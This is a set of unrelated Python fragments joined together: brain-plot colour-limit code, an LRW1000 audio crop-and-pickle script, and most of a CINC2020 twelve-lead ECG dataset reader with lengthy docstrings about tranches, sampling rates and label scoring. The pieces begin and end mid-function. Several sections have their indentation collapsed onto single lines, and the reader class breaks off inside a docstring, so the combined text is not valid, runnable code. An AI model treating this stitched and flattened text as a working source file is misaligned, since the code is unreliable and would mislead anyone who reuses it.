assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] if fmid is not None: lims['fmid'] = fmid if lims['fmin'] > fmid: logger.debug(f' Bumping fmin = {lims["fmin"]} to {fmid}') lims['fmin'] = fmid if lims['fmax'] < fmid: logger.debug(f' Bumping fmax = {lims["fmax"]} to {fmid}') lims['fmax'] = fmid assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] if fmax is not None: lims['fmax'] = fmax if lims['fmin'] > fmax: logger.debug(f' Bumping fmin = {lims["fmin"]} to {fmax}') lims['fmin'] = fmax if lims['fmid'] > fmax: logger.debug(f' Bumping fmid = {lims["fmid"]} to {fmax}') lims['fmid'] = fmax assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] def _get_range(brain): val = np.abs(np.concatenate(list(brain._current_act_data.values()))) return [np.min(val), np.max(val)] class _FakeIren(): def EnterEvent(self): pass def MouseMoveEvent(self): pass def LeaveEvent(self): pass def SetEventInformation(self, *args, **kwargs): pass def CharEvent(self): pass def KeyPressEvent(self, *args, **kwargs): pass def KeyReleaseEvent(self, *args, **kwargs): pass
###################################### ## 数据文件夹下LRW文件夹的名字. ## ###################################### LRW1000_DATA_PATH_NAME = '/data/zhangyk/data/CAS-VSR-W1k/audio/LRW1000_Public/audio' LRW1000_AUDIO_DATA_PATH_NAME = '/data/zhangyk/data/lrw1000_audio_pkl' ###################################### import torch from torch.utils.data import Dataset, DataLoader import numpy as np import glob import time import os import os.path as osp import sys sys.path.append("../") from models.metrics import ROOT_PATH from models.utils import mkdir, save_pickle, parse_dataloader_split_csv, nan_assert from tqdm.contrib import tzip import librosa import warnings warnings.filterwarnings('ignore') import torchaudio data_root_path = osp.join('/data/zhangyk/data', LRW1000_AUDIO_DATA_PATH_NAME) source_l, target_l = [], [] for stype in ['train', 'val', 'test', 'aux_val', 'aux_test']: csv_path = osp.join(ROOT_PATH, f'data/lrw1000/split/{stype}.csv') with open(csv_path, 'r') as f: csv_tmp = f.readlines() target_l.extend([osp.join(data_root_path, i.strip().split(',')[0]) for i in csv_tmp[1:]]) for i in csv_tmp[1:]: i_split = i.strip().split(',')[0] source_l.append(f'{i_split[i_split.rfind("_") + 1 : i_split.find(".pkl")]}.wav') seq_len = 26880 for i, j in tzip(source_l, target_l): waveform, sample_rate = torchaudio.load(osp.join(LRW1000_DATA_PATH_NAME, i)) assert sample_rate == 16000 waveform = waveform.squeeze(0) if waveform.shape[0] > seq_len: beg = int((waveform.shape[0] - seq_len) / 2) waveform = waveform[beg : beg + seq_len] elif waveform.shape[0] < seq_len: waveform = torch.cat([waveform, torch.zeros(seq_len - waveform.shape[0])]) assert waveform.shape[0] == seq_len waveform = waveform.cpu().detach().numpy() save_pickle(j, waveform)
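

# ---------------------------------------------------------------------------
# The crop/pad step above can be factored into a small helper; this is a
# sketch of the same logic (center-crop long clips, zero-pad short ones to
# exactly ``seq_len`` samples), not part of the original script. The function
# name is hypothetical.
# ---------------------------------------------------------------------------
def fix_waveform_length(waveform: torch.Tensor, seq_len: int = 26880) -> torch.Tensor:
    """Return a 1-D waveform of exactly ``seq_len`` samples."""
    n = waveform.shape[0]
    if n > seq_len:
        beg = (n - seq_len) // 2                 # center crop
        waveform = waveform[beg: beg + seq_len]
    elif n < seq_len:
        waveform = torch.cat([waveform, torch.zeros(seq_len - n)])  # right-pad with zeros
    assert waveform.shape[0] == seq_len
    return waveform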
# -*- coding: utf-8 -*-
"""
"""
import os, io, sys
import re
import json
import time
# import pprint
from copy import deepcopy
from datetime import datetime
from typing import Union, Optional, Any, List, Dict, Tuple, Set, Sequence, NoReturn
from numbers import Real, Number

import numpy as np
np.set_printoptions(precision=5, suppress=True)
import pandas as pd
import wfdb
from scipy.io import loadmat
from scipy.signal import resample, resample_poly

from ...cfg import CFG
from ...utils.misc import (
    get_record_list_recursive,
    get_record_list_recursive3,
    ms2samples,
    dict_to_str,
    ensure_siglen,
)
from ...utils import ecg_arrhythmia_knowledge as EAK
from ..aux_data.cinc2020_aux_data import (
    dx_mapping_all, dx_mapping_scored, dx_mapping_unscored,
    normalize_class,
    abbr_to_snomed_ct_code,
    df_weights_abbr,
    equiv_class_dict,
)
from ..base import PhysioNetDataBase, DEFAULT_FIG_SIZE_PER_SEC


__all__ = [
    "CINC2020",
    "compute_metrics",
    "compute_all_metrics",
]


# configurations for visualization
PlotCfg = CFG()
# default const for the plot function in dataset.py
# used only when corr. values are absent
# all values are time bias w.r.t. corr. peaks, with units in ms
PlotCfg.p_onset = -40
PlotCfg.p_offset = 40
PlotCfg.q_onset = -20
PlotCfg.s_offset = 40
PlotCfg.qrs_radius = 60
PlotCfg.t_onset = -100
PlotCfg.t_offset = 60


class CINC2020(PhysioNetDataBase):
    """ finished, under improving,

    Classification of 12-lead ECGs: the PhysioNet/Computing in Cardiology Challenge 2020

    ABOUT CINC2020
    --------------
    0. There are 6 different tranches of training data, listed as follows:
        A. 6,877 recordings from China Physiological Signal Challenge in 2018 (CPSC2018):
           PhysioNetChallenge2020_Training_CPSC.tar.gz in ref. [6]
        B. 3,453 recordings from China 12-Lead ECG Challenge Database (unused data from CPSC2018 and NOT the CPSC2018 test data):
           PhysioNetChallenge2020_Training_2.tar.gz in ref. [6]
        C. 74 recordings from the St Petersburg INCART 12-lead Arrhythmia Database:
           PhysioNetChallenge2020_Training_StPetersburg.tar.gz in ref. [6]
        D. 516 recordings from the PTB Diagnostic ECG Database:
           PhysioNetChallenge2020_Training_PTB.tar.gz in ref. [6]
        E. 21,837 recordings from the PTB-XL electrocardiography Database:
           PhysioNetChallenge2020_PTB-XL.tar.gz in ref. [6]
        F. 10,344 recordings from a Georgia 12-Lead ECG Challenge Database:
           PhysioNetChallenge2020_Training_E.tar.gz in ref. [6]
       In total, 43,101 labeled recordings of 12-lead ECGs from four countries (China, Germany, Russia, and the USA) across 3 continents have been posted publicly for this Challenge, with approximately the same number hidden for testing, representing the largest public collection of 12-lead ECGs.
    1. the A tranche training data come from CPSC2018, whose folder name is `Training_WFDB`. The B tranche training data are unused training data of CPSC2018, having folder name `Training_2`. For these 2 tranches, ref. the docstring of `database_reader.cpsc_databases.cpsc2018.CPSC2018`
    2. the C, D, E tranches of training data all come from the corresponding PhysioNet datasets, whose details can be found in the corresponding files:
        C: database_reader.physionet_databases.incartdb.INCARTDB
        D: database_reader.physionet_databases.ptbdb.PTBDB
        E: database_reader.physionet_databases.ptb_xl.PTB_XL
       the C tranche has folder name `Training_StPetersburg`, the D tranche has folder name `Training_PTB`, the E tranche has folder name `WFDB`
    3. the F tranche is entirely new, posted for this Challenge, and represents a unique demographic of the Southeastern United States. 
It has folder name `Training_E/WFDB`.
    4. only a part of diagnosis_abbr (diseases that appear in the labels of the 6 tranches of training data) are used in the scoring function (ref. `dx_mapping_scored_cinc2020`), while others are ignored (ref. `dx_mapping_unscored_cinc2020`). The scored diagnoses were chosen based on the prevalence of the diagnoses in the training data, the severity of the diagnoses, and the ability to determine the diagnoses from ECG recordings. The ignored diagnosis_abbr can be put in a "non-class" group.
    5. the (updated) scoring function has a scoring matrix with nonzero off-diagonal elements. This scoring function reflects the clinical reality that some misdiagnoses are more harmful than others and should be scored accordingly. Moreover, it reflects the fact that confusing some classes is much less harmful than confusing other classes.
    6. sampling frequencies:
        A. (CPSC2018): 500 Hz
        B. (CPSC2018-2): 500 Hz
        C. (INCART): 257 Hz
        D. (PTB): 1000 Hz
        E. (PTB-XL): 500 Hz
        F. (Georgia): 500 Hz
    7. all data are recorded in the leads ordering of
        ["I", "II", "III", "aVR", "aVL", "aVF", "V1", "V2", "V3", "V4", "V5", "V6"]
       using, for example, the following code:
       >>> db_dir = "/media/cfs/wenhao71/data/cinc2020_data/"
       >>> working_dir = "./working_dir"
       >>> dr = CINC2020Reader(db_dir=db_dir,working_dir=working_dir)
       >>> set_leads = []
       >>> for tranche, l_rec in dr.all_records.items():
       ...     for rec in l_rec:
       ...         ann = dr.load_ann(rec)
       ...         leads = ann["df_leads"]["lead_name"].values.tolist()
       ...         if leads not in set_leads:
       ...             set_leads.append(leads)

    NOTE
    ----
    1. The datasets have been roughly processed to have a uniform format, hence differ from their original resource (e.g. differ in sampling frequency, sample duration, etc.)
    2. The original datasets might have richer metadata (especially those from PhysioNet), which can be fetched from the corresponding reader's docstring or the website of the original source
    3. Each sub-dataset might have its own organizing scheme of data, which should be carefully dealt with
    4. There are few "absolute" diagnoses in 12-lead ECGs, where large discrepancies in the interpretation of the ECG can be found even when inspected by experts. There is inevitably something lost in translation, especially when you do not have the context. This doesn't mean making an algorithm isn't important
    5. The labels are noisy, which one has to deal with in all real-world data
    6. each line of the following classes is considered the same (in the scoring matrix):
        - RBBB, CRBBB (NOT including IRBBB)
        - PAC, SVPB
        - PVC, VPB
    7. unfortunately, the newly added tranches (C - F) have baseline drift and are much noisier. In contrast, CPSC data have had the baseline removed and have higher SNR
    8. on Aug. 1, 2020, adc gain (including "resolution", "ADC"? in .hea files) of datasets INCART, PTB, and PTB-XL (tranches C, D, E) were corrected. After correction, (the .tar files of) the 3 datasets are all put in a "WFDB" subfolder. In order to keep the structures consistent, they are moved into "Training_StPetersburg", "Training_PTB", "WFDB" as previously. Using the following code, one can check the adc_gain and baselines of each tranche:
        >>> db_dir = "/media/cfs/wenhao71/data/cinc2020_data/"
        >>> working_dir = "./working_dir"
        >>> dr = CINC2020(db_dir=db_dir,working_dir=working_dir)
        >>> resolution = {tranche: set() for tranche in "ABCDEF"}
        >>> baseline = {tranche: set() for tranche in "ABCDEF"}
        >>> for tranche, l_rec in dr.all_records.items():
        ...     for rec in l_rec:
        ...         ann = dr.load_ann(rec)
        ...         
resolution[tranche] = resolution[tranche].union(set(ann["df_leads"]["adc_gain"]))
        ...         baseline[tranche] = baseline[tranche].union(set(ann["df_leads"]["baseline"]))
        >>> print(resolution, baseline)
        {"A": {1000.0}, "B": {1000.0}, "C": {1000.0}, "D": {1000.0}, "E": {1000.0}, "F": {1000.0}}
        {"A": {0}, "B": {0}, "C": {0}, "D": {0}, "E": {0}, "F": {0}}
    9. the .mat files all contain digital signals, which have to be converted to physical values using the adc gain, baseline, etc. in the corresponding .hea files. `wfdb.rdrecord` has already done this conversion, hence greatly simplifies the data loading process. NOTE that there's a difference when using `wfdb.rdrecord`: data from `loadmat` are in "channel_first" format, while `wfdb.rdrecord.p_signal` produces data in the "channel_last" format
    10. there are 3 equivalent pairs (2 classes are equivalent if the corr. value in the scoring matrix is 1): (RBBB, CRBBB), (PAC, SVPB), (PVC, VPB)
    11. in the newly (Feb., 2021) created dataset (ref. [7]), header files of each subset were gathered into one separate compressed file. This is due to the fact that updates on the dataset are almost always done in the header files. The correct usage of ref. [7], after uncompressing, is replacing the header files in the folder `All_training_WFDB` by the header files from the 6 folders containing all header files from the 6 subsets.

    ISSUES
    ------
    1. reading the .hea files, the baselines of all records are 0, however this is not the case if one plots the signal
    2. about half of the LAD records satisfy the "2-lead" criteria, but fail the "3-lead" criteria, which means that their axis is in (-30°, 0°), which is not truly LAD
    3. (Aug. 15, 2020; resolved, and changed to 1000) tranche F, the Georgia subset, has ADC gain 4880 which might be too high. Thus the obtained voltages are too low. 1000 might be a suitable (correct) value of ADC gain for this tranche just as for the other tranches.
    4. "E04603" (all leads), "E06072" (chest leads, especially V1-V3), "E06909" (lead V2), "E07675" (lead V3), "E07941" (lead V6), "E08321" (lead V6) have exceptionally large values at rpeaks, and reading (`load_data`) these records using `wfdb` would bring in `nan` values. One can check using the following code
        >>> rec = "E04603"
        >>> dr.plot(rec, dr.load_data(rec, backend="scipy", units="uv"))  # currently raising error

    Usage
    -----
    1. 
ECG arrhythmia detection References ---------- [1] https://physionetchallenges.github.io/2020/ [2] http://2018.icbeb.org/# [3] https://physionet.org/content/incartdb/1.0.0/ [4] https://physionet.org/content/ptbdb/1.0.0/ [5] https://physionet.org/content/ptb-xl/1.0.1/ [6] (deprecated) https://storage.cloud.google.com/physionet-challenge-2020-12-lead-ecg-public/ [7] (recommended) https://storage.cloud.google.com/physionetchallenge2021-public-datasets/ """ def __init__(self, db_dir:str, working_dir:Optional[str]=None, verbose:int=2, **kwargs:Any) -> NoReturn: """ Parameters ---------- db_dir: str, storage path of the database working_dir: str, optional, working directory, to store intermediate files and log file verbose: int, default 2, log verbosity kwargs: auxilliary key word arguments """ super().__init__(db_name="CINC2020", db_dir=db_dir, working_dir=working_dir, verbose=verbose, **kwargs) self.rec_ext = "mat" self.ann_ext = "hea" self.db_tranches = list("ABCDEF") self.tranche_names = CFG({ "A": "CPSC", "B": "CPSC-Extra", "C": "StPetersburg", "D": "PTB", "E": "PTB-XL", "F": "Georgia", }) self.rec_prefix = CFG({ "A": "A", "B": "Q", "C": "I", "D": "S", "E": "HR", "F": "E", }) self.db_dir_base = db_dir self.db_dirs = CFG({tranche:"" for tranche in self.db_tranches}) self._all_records = None self._ls_rec() # loads file system structures into self.db_dirs and self._all_records self._diagnoses_records_list = None self._ls_diagnoses_records() self.fs = { "A": 500, "B": 500, "C": 257, "D": 1000, "E": 500, "F": 500, } self.spacing = {t: 1000 / f for t,f in self.fs.items()} self.all_leads = deepcopy(EAK.Standard12Leads) self._all_leads_set = set(self.all_leads) self.df_ecg_arrhythmia = dx_mapping_all[["Dx","SNOMED CT Code","Abbreviation"]] self.ann_items = [ "rec_name", "nb_leads","fs","nb_samples","datetime","age","sex", "diagnosis","df_leads", "medical_prescription","history","symptom_or_surgery", ] self.label_trans_dict = equiv_class_dict.copy() # self.value_correction_factor = CFG({tranche:1 for tranche in self.db_tranches}) # self.value_correction_factor.F = 4.88 # ref. ISSUES 3 self.exceptional_records = ["E04603", "E06072", "E06909", "E07675", "E07941", "E08321"] # ref. ISSUES 4 def get_subject_id(self, rec:str) -> int: """ finished, checked, Parameters ---------- rec: str, name of the record Returns ------- sid: int, the `subject_id` corr. 
to `rec`
        """
        s2d = {"A":"11", "B":"12", "C":"21", "D":"31", "E":"32", "F":"41"}
        s2d = {self.rec_prefix[k]:v for k,v in s2d.items()}
        prefix = "".join(re.findall(r"[A-Z]", rec))
        n = rec.replace(prefix,"")
        sid = int(f"{s2d[prefix]}{'0'*(8-len(n))}{n}")
        return sid

    def _ls_rec(self) -> NoReturn:
        """ finished, checked,

        list all the records and load into `self._all_records`,
        facilitating further uses
        """
        fn = "record_list.json"
        record_list_fp = os.path.join(self.db_dir_base, fn)
        if os.path.isfile(record_list_fp):
            with open(record_list_fp, "r") as f:
                self._all_records = {k:v for k,v in json.load(f).items() if k in self.tranche_names}
            for tranche in self.db_tranches:
                self.db_dirs[tranche] = os.path.join(self.db_dir_base, os.path.dirname(self._all_records[tranche][0]))
                self._all_records[tranche] = [os.path.basename(f) for f in self._all_records[tranche]]
        else:
            print("Please wait patiently to let the reader find all records of all the tranches...")
            start = time.time()
            rec_patterns_with_ext = {
                tranche: f"^{self.rec_prefix[tranche]}(?:\d+).{self.rec_ext}$" \
                    for tranche in self.db_tranches
            }
            self._all_records = \
                get_record_list_recursive3(self.db_dir_base, rec_patterns_with_ext)
            to_save = deepcopy(self._all_records)
            for tranche in self.db_tranches:
                tmp_dirname = [ os.path.dirname(f) for f in self._all_records[tranche] ]
                if len(set(tmp_dirname)) != 1:
                    if len(set(tmp_dirname)) > 1:
                        raise ValueError(f"records of tranche {tranche} are stored in several folders!")
                    else:
                        raise ValueError(f"no record found for tranche {tranche}!")
                self.db_dirs[tranche] = os.path.join(self.db_dir_base, tmp_dirname[0])
                self._all_records[tranche] = [os.path.basename(f) for f in self._all_records[tranche]]
            print(f"Done in {time.time() - start:.5f} seconds!")
            with open(os.path.join(self.db_dir_base, fn), "w") as f:
                json.dump(to_save, f)

    def _ls_diagnoses_records(self) -> NoReturn:
        """ finished, checked,

        list all the records for all diagnoses
        """
        fn = "diagnoses_records_list.json"
        dr_fp = os.path.join(self.db_dir_base, fn)
        if os.path.isfile(dr_fp):
            with open(dr_fp, "r") as f:
                self._diagnoses_records_list = json.load(f)
        else:
            print("Please wait several minutes patiently to let the reader list records for each diagnosis...")
            start = time.time()
            self._diagnoses_records_list = {d: [] for d in df_weights_abbr.columns.values.tolist()}
            for tranche, l_rec in self._all_records.items():
                for rec in l_rec:
                    ann = self.load_ann(rec)
                    ld = ann["diagnosis_scored"]["diagnosis_abbr"]
                    for d in ld:
                        self._diagnoses_records_list[d].append(rec)
            print(f"Done in {time.time() - start:.5f} seconds!")
            with open(dr_fp, "w") as f:
                json.dump(self._diagnoses_records_list, f)
        self._all_records = CFG(self._all_records)

    @property
    def diagnoses_records_list(self):
        """ finished, checked,
        """
        if self._diagnoses_records_list is None:
            self._ls_diagnoses_records()
        return self._diagnoses_records_list

    def _get_tranche(self, rec:str) -> str:
        """ finished, checked,

        get the tranche's symbol (one of "A","B","C","D","E","F") of a record via its name

        Parameters
        ----------
        rec: str,
            name of the record

        Returns
        -------
        tranche, str,
            symbol of the tranche, ref. 
`self.rec_prefix` """ prefix = "".join(re.findall(r"[A-Z]", rec)) tranche = {v:k for k,v in self.rec_prefix.items()}[prefix] return tranche def get_data_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, get the absolute file path of the data file of `rec` Parameters ---------- rec: str, name of the record with_ext: bool, default True, if True, the returned file path comes with file extension, otherwise without file extension, which is useful for `wfdb` functions Returns ------- fp: str, absolute file path of the data file of the record """ tranche = self._get_tranche(rec) fp = os.path.join(self.db_dirs[tranche], f"{rec}.{self.rec_ext}") if not with_ext: fp = os.path.splitext(fp)[0] return fp def get_header_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, get the absolute file path of the header file of `rec` Parameters ---------- rec: str, name of the record with_ext: bool, default True, if True, the returned file path comes with file extension, otherwise without file extension, which is useful for `wfdb` functions Returns ------- fp: str, absolute file path of the header file of the record """ tranche = self._get_tranche(rec) fp = os.path.join(self.db_dirs[tranche], f"{rec}.{self.ann_ext}") if not with_ext: fp = os.path.splitext(fp)[0] return fp def get_ann_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, alias for `get_header_filepath` """ fp = self.get_header_filepath(rec, with_ext=with_ext) return fp def load_data(self, rec:str, leads:Optional[Union[str, List[str]]]=None, data_format:str="channel_first", backend:str="wfdb", units:str="mV", fs:Optional[Real]=None) -> np.ndarray: """ finished, checked, load physical (converted from digital) ecg data, which is more understandable for humans Parameters ---------- rec: str, name of the record leads: str or list of str, optional, the leads to load data_format: str, default "channel_first", format of the ecg data, "channel_last" (alias "lead_last"), or "channel_first" (alias "lead_first") backend: str, default "wfdb", the backend data reader, can also be "scipy" units: str, default "mV", units of the output signal, can also be "μV", with an alias of "uV" fs: real number, optional, if not None, the loaded data will be resampled to this frequency Returns ------- data: ndarray, the ecg data """ assert data_format.lower() in ["channel_first", "lead_first", "channel_last", "lead_last"] tranche = self._get_tranche(rec) if not leads: _leads = self.all_leads elif isinstance(leads, str): _leads = [leads] else: _leads = leads # if tranche in "CD" and fs == 500: # resample will be done at the end of the function # data = self.load_resampled_data(rec) if backend.lower() == "wfdb": rec_fp = self.get_data_filepath(rec, with_ext=False) # p_signal of "lead_last" format wfdb_rec = wfdb.rdrecord(rec_fp, physical=True, channel_names=_leads) data = np.asarray(wfdb_rec.p_signal.T) # lead_units = np.vectorize(lambda s: s.lower())(wfdb_rec.units) elif backend.lower() == "scipy": # loadmat of "lead_first" format rec_fp = self.get_data_filepath(rec, with_ext=True) data = loadmat(rec_fp)["val"] header_info = self.load_ann(rec, raw=False)["df_leads"] baselines = header_info["baseline"].values.reshape(data.shape[0], -1) adc_gain = header_info["adc_gain"].values.reshape(data.shape[0], -1) data = np.asarray(data-baselines) / adc_gain leads_ind = [self.all_leads.index(item) for item in _leads] data = data[leads_ind,:] # lead_units = np.vectorize(lambda s: 
s.lower())(header_info["df_leads"]["adc_units"].values) else: raise ValueError(f"backend `{backend.lower()}` not supported for loading data") # ref. ISSUES 3, for multiplying `value_correction_factor` # data = data * self.value_correction_factor[tranche] if units.lower() in ["uv", "μv"]: data = data * 1000 if fs is not None and fs != self.fs[tranche]: data = resample_poly(data, fs, self.fs[tranche], axis=1) if data_format.lower() in ["channel_last", "lead_last"]: data = data.T return data def load_ann(self, rec:str, raw:bool=False, backend:str="wfdb") -> Union[dict,str]: """ finished, checked, load annotations (header) stored in the .hea files Parameters ---------- rec: str, name of the record raw: bool, default False, if True, the raw annotations without parsing will be returned backend: str, default "wfdb", case insensitive, if is "wfdb", `wfdb.rdheader` will be used to load the annotations; if is "naive", annotations will be parsed from the lines read from the header files Returns ------- ann_dict, dict or str, the annotations with items: ref. `self.ann_items` """ tranche = self._get_tranche(rec) ann_fp = self.get_ann_filepath(rec, with_ext=True) with open(ann_fp, "r") as f: header_data = f.read().splitlines() if raw: ann_dict = "\n".join(header_data) return ann_dict if backend.lower() == "wfdb": ann_dict = self._load_ann_wfdb(rec, header_data) elif backend.lower() == "naive": ann_dict = self._load_ann_naive(header_data) else: raise ValueError(f"backend `{backend.lower()}` not supported for loading annotations") return ann_dict def _load_ann_wfdb(self, rec:str, header_data:List[str]) -> dict: """ finished, checked, Parameters ---------- rec: str, name of the record header_data: list of str, list of lines read directly from a header file, complementary to data read using `wfdb.rdheader` if applicable, this data will be used, since `datetime` is not well parsed by `wfdb.rdheader` Returns ------- ann_dict, dict, the annotations with items: ref. `self.ann_items` """ header_fp = self.get_header_filepath(rec, with_ext=False) header_reader = wfdb.rdheader(header_fp) ann_dict = {} ann_dict["rec_name"], ann_dict["nb_leads"], ann_dict["fs"], ann_dict["nb_samples"], ann_dict["datetime"], daytime = header_data[0].split(" ") ann_dict["nb_leads"] = int(ann_dict["nb_leads"]) ann_dict["fs"] = int(ann_dict["fs"]) ann_dict["nb_samples"] = int(ann_dict["nb_samples"]) ann_dict["datetime"] = datetime.strptime(" ".join([ann_dict["datetime"], daytime]), "%d-%b-%Y %H:%M:%S") try: # see NOTE. 1. 
ann_dict["age"] = int([l for l in header_reader.comments if "Age" in l][0].split(": ")[-1]) except: ann_dict["age"] = np.nan try: ann_dict["sex"] = [l for l in header_reader.comments if "Sex" in l][0].split(": ")[-1] except: ann_dict["sex"] = "Unknown" try: ann_dict["medical_prescription"] = [l for l in header_reader.comments if "Rx" in l][0].split(": ")[-1] except: ann_dict["medical_prescription"] = "Unknown" try: ann_dict["history"] = [l for l in header_reader.comments if "Hx" in l][0].split(": ")[-1] except: ann_dict["history"] = "Unknown" try: ann_dict["symptom_or_surgery"] = [l for l in header_reader.comments if "Sx" in l][0].split(": ")[-1] except: ann_dict["symptom_or_surgery"] = "Unknown" l_Dx = [l for l in header_reader.comments if "Dx" in l][0].split(": ")[-1].split(",") ann_dict["diagnosis"], ann_dict["diagnosis_scored"] = self._parse_diagnosis(l_Dx) df_leads = pd.DataFrame() for k in ["file_name", "fmt", "byte_offset", "adc_gain", "units", "adc_res", "adc_zero", "baseline", "init_value", "checksum", "block_size", "sig_name"]: df_leads[k] = header_reader.__dict__[k] df_leads = df_leads.rename( columns={ "sig_name": "lead_name", "units":"adc_units", "file_name":"filename", } ) df_leads.index = df_leads["lead_name"] df_leads.index.name = None ann_dict["df_leads"] = df_leads return ann_dict def _load_ann_naive(self, header_data:List[str]) -> dict: """ finished, checked, load annotations (header) using raw data read directly from a header file Parameters ---------- header_data: list of str, list of lines read directly from a header file Returns ------- ann_dict, dict, the annotations with items: ref. `self.ann_items` """ ann_dict = {} ann_dict["rec_name"], ann_dict["nb_leads"], ann_dict["fs"], ann_dict["nb_samples"], ann_dict["datetime"], daytime = header_data[0].split(" ") ann_dict["nb_leads"] = int(ann_dict["nb_leads"]) ann_dict["fs"] = int(ann_dict["fs"]) ann_dict["nb_samples"] = int(ann_dict["nb_samples"]) ann_dict["datetime"] = datetime.strptime(" ".join([ann_dict["datetime"], daytime]), "%d-%b-%Y %H:%M:%S") try: # see NOTE. 1. 
ann_dict["age"] = int([l for l in header_data if l.startswith("#Age")][0].split(": ")[-1]) except: ann_dict["age"] = np.nan try: ann_dict["sex"] = [l for l in header_data if l.startswith("#Sex")][0].split(": ")[-1] except: ann_dict["sex"] = "Unknown" try: ann_dict["medical_prescription"] = [l for l in header_data if l.startswith("#Rx")][0].split(": ")[-1] except: ann_dict["medical_prescription"] = "Unknown" try: ann_dict["history"] = [l for l in header_data if l.startswith("#Hx")][0].split(": ")[-1] except: ann_dict["history"] = "Unknown" try: ann_dict["symptom_or_surgery"] = [l for l in header_data if l.startswith("#Sx")][0].split(": ")[-1] except: ann_dict["symptom_or_surgery"] = "Unknown" l_Dx = [l for l in header_data if l.startswith("#Dx")][0].split(": ")[-1].split(",") ann_dict["diagnosis"], ann_dict["diagnosis_scored"] = self._parse_diagnosis(l_Dx) ann_dict["df_leads"] = self._parse_leads(header_data[1:13]) return ann_dict def _parse_diagnosis(self, l_Dx:List[str]) -> Tuple[dict, dict]: """ finished, checked, Parameters ---------- l_Dx: list of str, raw information of diagnosis, read from a header file Returns ------- diag_dict:, dict, diagnosis, including SNOMED CT Codes, fullnames and abbreviations of each diagnosis diag_scored_dict: dict, the scored items in `diag_dict` """ diag_dict, diag_scored_dict = {}, {} try: diag_dict["diagnosis_code"] = [item for item in l_Dx] # selection = dx_mapping_all["SNOMED CT Code"].isin(diag_dict["diagnosis_code"]) # diag_dict["diagnosis_abbr"] = dx_mapping_all[selection]["Abbreviation"].tolist() # diag_dict["diagnosis_fullname"] = dx_mapping_all[selection]["Dx"].tolist() diag_dict["diagnosis_abbr"] = \ [ dx_mapping_all[dx_mapping_all["SNOMED CT Code"]==dc]["Abbreviation"].values[0] \ for dc in diag_dict["diagnosis_code"] ] diag_dict["diagnosis_fullname"] = \ [ dx_mapping_all[dx_mapping_all["SNOMED CT Code"]==dc]["Dx"].values[0] \ for dc in diag_dict["diagnosis_code"] ] scored_indices = np.isin(diag_dict["diagnosis_code"], dx_mapping_scored["SNOMED CT Code"].values) diag_scored_dict["diagnosis_code"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_code"]) \ if scored_indices[idx] ] diag_scored_dict["diagnosis_abbr"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_abbr"]) \ if scored_indices[idx] ] diag_scored_dict["diagnosis_fullname"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_fullname"]) \ if scored_indices[idx] ] except: # the old version, the Dx"s are abbreviations diag_dict["diagnosis_abbr"] = diag_dict["diagnosis_code"] selection = dx_mapping_all["Abbreviation"].isin(diag_dict["diagnosis_abbr"]) diag_dict["diagnosis_fullname"] = dx_mapping_all[selection]["Dx"].tolist() # if not keep_original: # for idx, d in enumerate(ann_dict["diagnosis_abbr"]): # if d in ["Normal", "NSR"]: # ann_dict["diagnosis_abbr"] = ["N"] return diag_dict, diag_scored_dict def _parse_leads(self, l_leads_data:List[str]) -> pd.DataFrame: """ finished, checked, Parameters ---------- l_leads_data: list of str, raw information of each lead, read from a header file Returns ------- df_leads: DataFrame, infomation of each leads in the format of DataFrame """ df_leads = pd.read_csv(io.StringIO("\n".join(l_leads_data)), delim_whitespace=True, header=None) df_leads.columns = ["filename", "fmt+byte_offset", "adc_gain+units", "adc_res", "adc_zero", "init_value", "checksum", "block_size", "lead_name",] df_leads["fmt"] = df_leads["fmt+byte_offset"].apply(lambda s: s.split("+")[0]) df_leads["byte_offset"] = df_leads["fmt+byte_offset"].apply(lambda 
s: s.split("+")[1]) df_leads["adc_gain"] = df_leads["adc_gain+units"].apply(lambda s: s.split("/")[0]) df_leads["adc_units"] = df_leads["adc_gain+units"].apply(lambda s: s.split("/")[1]) for k in ["byte_offset", "adc_gain", "adc_res", "adc_zero", "init_value", "checksum",]: df_leads[k] = df_leads[k].apply(lambda s: int(s)) df_leads["baseline"] = df_leads["adc_zero"] df_leads = df_leads[["filename", "fmt", "byte_offset", "adc_gain", "adc_units", "adc_res", "adc_zero", "baseline", "init_value", "checksum", "block_size", "lead_name"]] df_leads.index = df_leads["lead_name"] df_leads.index.name = None return df_leads def load_header(self, rec:str, raw:bool=False) -> Union[dict,str]: """ alias for `load_ann`, as annotations are also stored in header files """ return self.load_ann(rec, raw) def get_labels(self, rec:str, scored_only:bool=True, fmt:str="s", normalize:bool=True) -> List[str]: """ finished, checked, read labels (diagnoses or arrhythmias) of a record Parameters ---------- rec: str, name of the record scored_only: bool, default True, only get the labels that are scored in the CINC2020 official phase fmt: str, default "a", the format of labels, one of the following (case insensitive): - "a", abbreviations - "f", full names - "s", SNOMED CT Code normalize: bool, default True, if True, the labels will be transformed into their equavalents, which are defined in `utils.utils_misc.cinc2020_aux_data.py` Returns ------- labels, list, the list of labels """ ann_dict = self.load_ann(rec) if scored_only: labels = ann_dict["diagnosis_scored"] else: labels = ann_dict["diagnosis"] if fmt.lower() == "a": labels = labels["diagnosis_abbr"] elif fmt.lower() == "f": labels = labels["diagnosis_fullname"] elif fmt.lower() == "s": labels = labels["diagnosis_code"] else: raise ValueError(f"`fmt` should be one of `a`, `f`, `s`, but got `{fmt}`") if normalize: labels = [self.label_trans_dict.get(item, item) for item in labels] return labels def get_fs(self, rec:str) -> Real: """ finished, checked, get the sampling frequency of a record Parameters ---------- rec: str, name of the record Returns ------- fs: real number, sampling frequency of the record `rec` """ tranche = self._get_tranche(rec) fs = self.fs[tranche] return fs def get_subject_info(self, rec:str, items:Optional[List[str]]=None) -> dict: """ finished, checked, read auxiliary information of a subject (a record) stored in the header files Parameters ---------- rec: str, name of the record items: list of str, optional, items of the subject's information (e.g. sex, age, etc.) 
